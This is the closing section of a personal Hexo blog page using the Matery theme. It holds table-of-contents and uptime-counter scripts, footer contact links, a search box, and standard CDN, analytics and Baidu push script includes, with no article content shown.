            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
    <div class="container row center-align" style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            <span id="year">2020</span>
            <a href="/about" target="_blank">1cePeak</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <span id="sitetime">载入运行时间...</span>
            <script>
                function siteTime() {
                    var seconds = 1000;
                    var minutes = seconds * 60;
                    var hours = minutes * 60;
                    var days = hours * 24;
                    var years = days * 365;
                    var today = new Date();
                    var startYear = "2020";
                    var startMonth = "5";
                    var startDate = "1";
                    var startHour = "0";
                    var startMinute = "0";
                    var startSecond = "0";
                    var todayYear = today.getFullYear();
                    var todayMonth = today.getMonth() + 1;
                    var todayDate = today.getDate();
                    var todayHour = today.getHours();
                    var todayMinute = today.getMinutes();
                    var todaySecond = today.getSeconds();
                    var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                    var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                    var diff = t2 - t1;
                    var diffYears = Math.floor(diff / years);
                    var diffDays = Math.floor((diff / days) - diffYears * 365);
                    var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
                    var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) /
                        minutes);
                    var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours -
                        diffMinutes * minutes) / seconds);
                    if (startYear == todayYear) {
                        document.getElementById("year").innerHTML = todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffDays + " 天 " + diffHours +
                            " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    } else {
                        document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffYears + " 年 " + diffDays +
                            " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    }
                }
                setInterval(siteTime, 1000);
            </script>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/1ceP3ak" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:929085803@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>



    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=929085803" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 929085803" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>



    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/search.xml", 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/materialize/materialize.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/aos/aos.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    
    <script async src="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    

    

    

    
    <script src="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/instantpage/instantpage.js" type="module"></script>
    

    <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
    <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
    <script type="text/javascript" src="/js/fireworks.js"></script>

</body>

</html>